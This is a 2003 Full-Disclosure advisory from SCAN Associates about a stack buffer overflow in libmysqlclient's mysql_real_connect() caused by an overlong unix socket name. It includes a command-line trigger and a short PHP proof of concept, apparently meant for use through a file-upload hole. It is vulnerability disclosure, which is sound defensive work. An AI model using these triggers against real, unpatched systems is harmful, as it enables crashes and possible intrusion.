SCAN Associates Sdn Bhd Security Advisory Products: libmysqlclient 4.x and below (http://www.mysql.com) Date: 12 June 2003 Author: pokleyzz <pokleyzz_at_scan-associates.net> Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net URL: http://www.scan-associates.net Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow. Description =========== libmysqlclient is client library to communicate with mysql server. Details ======= There is stack buffer overflow in mysql_real_connect() function with long unix socket name (over 300 character). ex: mysql -S `perl -e 'print "A" x 350'` -hlocalhost proof of concept ---------------- This bug have succesfully test on safe_mode php in our latest geeklog bug http://www.scan-associates.net/papers/geeklog.txt where user can upload *.php file. <?php for ($i;$i<350;$i++) $buff .= "A"; ini_set("mysql.default_socket","$buff"); mysql_connect("localhost", "blabla", "blabla"); ?> Vendor Response =============== Vendor has been contacted on 06/01/2003 and fix will available soon. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Thu Jun 12 2003 - 08:19:39 PDT